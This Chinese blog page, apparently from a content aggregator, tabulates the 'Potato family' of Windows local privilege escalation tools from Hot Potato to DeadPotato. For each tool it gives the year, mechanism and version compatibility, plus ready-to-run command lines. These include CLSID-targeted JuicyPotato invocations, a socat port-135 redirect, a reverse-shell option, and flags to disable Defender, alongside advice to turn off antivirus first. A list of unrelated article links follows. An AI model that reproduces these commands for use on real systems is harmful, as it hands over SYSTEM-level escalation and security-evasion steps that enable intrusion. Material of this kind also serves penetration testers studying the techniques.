当前位置: 首页 > news >正文

土豆家族工具使用适配表格大全【windows提权】

“土豆家族”(Potato Family)指的是Windows本地权限提升(Local Privilege Escalation)工具系列,这些工具主要利用DCOM、RPC、NTLM中继等机制,从低权限用户(如SeImpersonatePrivilege)提升至SYSTEM权限。以下表格基于可靠来源整理,涵盖主要工具的名称、发布年份、关键特性、Windows版本兼容性、使用要求/基本步骤及下载链接,供大家参考。

工具名称发布年份关键特性Windows 兼容性使用要求/基本步骤下载链接
Hot Potato2016NTLM 中继(HTTP->SMB)和 NBNS 欺骗,利用 WPAD 代理服务器创建高权限进程。Windows 7/8/10, Server 2008/2012 (部分 1809+ 需测试)要求:SeImpersonatePrivilege。
步骤:1. 下载二进制;2. Potato.exe -ip -cmd "cmd.exe" -disable_exhaust true -disable_defender true
GitHub
RottenPotato2016DCOM 触发,利用 BITS CLSID 和固定端口 6666 进行 MITM NTLM 交换,窃取 SYSTEM 令牌。< Windows 10 1809 / Server 2019要求:Meterpreter shell + Incognito 模式。
步骤:1. 下载;2. MSFRottenPotato.exe t "c:\windows\temp\test.bat"
GitHub
RottenPotatoNG2017RottenPotato 的 C++ 重实现,无需 Meterpreter,直接生成特权进程。< Windows 10 1809 / Server 2019要求:SeImpersonatePrivilege。
步骤:1. 下载 DLL/EXE;2. 注入或运行 RottenPotatoNG.exe -cmd "cmd.exe"
GitHub
JuicyPotato2017RottenPotatoNG 增强版,使用多个 CLSID(非固定 BITS),灵活创建进程,支持 x64。< Windows 10 1809 / Server 2019 (x64 版兼容 11 部分场景)要求:SeImpersonatePrivilege。
步骤:1. 下载;2. juicypotato.exe -l 1337 -p "cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
GitHub
LonelyPotato2018DCOM 滥用,类似 Rotten 但针对特定场景,直接 API 模拟,无需 Meterpreter。Windows 7-10 (已弃用,推荐 JuicyPotato)要求:基本 DCOM 权限。
步骤:1. 下载;2. 运行 LonelyPotato.exe -cmd "cmd.exe"(简单注入)。
GitHub
RoguePotato2019RPC over 自定义端口,利用 socat 重定向和命名管道窃取令牌。>= Windows 10 1809 / Server 2019要求:控制端口 135 访问。
步骤:1. socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999;2. RoguePotato.exe -r YOUR_IP -e "cmd.exe" -l 9999
GitHub
SweetPotato2020多模式集合(DCOM/WinRM/EfsRpc/PrintSpoofer),集成多种 Potato 技术,自动化选择。Windows 7+(视模式而定,2025 测试兼容 11)要求:SeImpersonatePrivilege。
步骤:1. 下载;2. SweetPotato.exe -m dcom -c "cmd.exe"(DCOM 模式示例)。
GitHub
GenericPotato2021HTTP/命名管道模拟认证,适用于 Print 服务未运行或 BITS 禁用场景,支持 WinRM。Windows 10+ (兼容 Server 2022)要求:SeImpersonatePrivilege,WinRM 运行。
步骤:1. 下载;2. GenericPotato.exe -m http -p "cmd.exe" -l 8080
GitHub
JuicyPotatoNG2022JuicyPotato 的下一代版,优化 DCOM 滥用,支持 CreateProcessWithTokenW/AsUser 进程创建,CLSID 暴力破解模式。>= Windows 10 1803 / Server 2019 (兼容 11/Server 2022,防火墙绕过)要求:SeImpersonatePrivilege。
步骤:1. 下载;2. JuicyPotatoNG.exe -t * -p "cmd.exe" -l 1337 -c {854A20FB-2D44-457D-992F-EF13785D2B51}(* 为自动尝试类型)。
GitHub
GodPotato2023高级 DCOM 滥用,支持几乎所有版本,结合令牌窃取和进程注入,使用内置 CLSID。Windows 7+(几乎全兼容,包括 11/2022)要求:SeImpersonatePrivilege。
步骤:1. 下载;2. GodPotato.exe -cmd "cmd.exe" -user "NT AUTHORITY\SYSTEM"
GitHub
LocalPotato2023本地 DCOM 强制 SYSTEM 认证,针对 SMB/HTTP 服务器写任意文件,利用 NTLM 挑战。Windows 10+(CVE-2023-21746 后仍部分有效)要求:SeImpersonatePrivilege。
步骤:1. 下载;2. LocalPotato.exe -cmd "cmd.exe" -spn "cifs/127.0.0.1"
GitHub
DeadPotato2024GodPotato 自定义版,扩展模块(cmd/rev/exe/newadmin/shell/mimi/defender/sharphound),利用 DCOM RPCSS OXID 缺陷。Windows 10+(2025 测试兼容 11/Server 2022)要求:SeImpersonatePrivilege(用 whoami /priv 验证)。
步骤:1. 下载;2. deadpotato.exe -cmd "whoami"-rev IP:PORT
GitHub

通用要求:大多数工具需SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege;运行前禁用AV/Defender可能必要。

http://www.dtcms.com/a/441949.html

相关文章:

  • PyQt5 QPushButton组件详解:按钮控件的完整指南
  • Linux中do_wait函数的实现
  • 第1章 线程安全的对象生命期管理
  • Codeforces Round 1027 A. Square Year (2114)
  • 公司网站备案信息查询嵌入式开发培训
  • mysql--核心日志文件详解
  • 营销型网站要多少钱广告联盟app
  • 浙江建设职业技术学院官方网站中信建设有限责任公司资质等级
  • Vidmy 1.0.129| 无限制下载国外视频,支持高速下载、即时抓取高清视频。使用需要科学
  • (CVPR2025)DEIM模型训练自己的数据集教程(基于Pycharm)
  • 13.排序(上)
  • 《KelpBar海带Linux智慧屏项目》
  • 二叉树的层序遍历--力扣
  • 解决Linux下操作无权限问题——chmod: 正在更改...的权限:不允许的操作
  • 哈尔滨论坛建站模板ftp上传网站后怎么弄
  • 使用D3.js画人物关系图
  • 数据结构与算法篇--语义智能指针设计模式
  • 微信小程序入门学习教程,从入门到精通,WXML(WeiXin Markup Language)语法基础(8)
  • 明天好好总结汇总分析博客
  • HTML--在textarea左侧添加行号
  • mysql逻辑备份跟物理备份的区别
  • Django 学习日志
  • 如何用word做简单的网站wordpress绑定
  • 第十三篇:Python并发编程进阶:多进程(multiprocessing)
  • 硬件-电容学习DAY23——电容设计实战指南:从选型到高频应用
  • 20232022年408真题易错知识点整理
  • 【Qt开发】输入类控件(四)-> QSpinBox
  • uniapp与webview通信
  • 地推app接任务平台网站图片大小优化
  • Java Stream API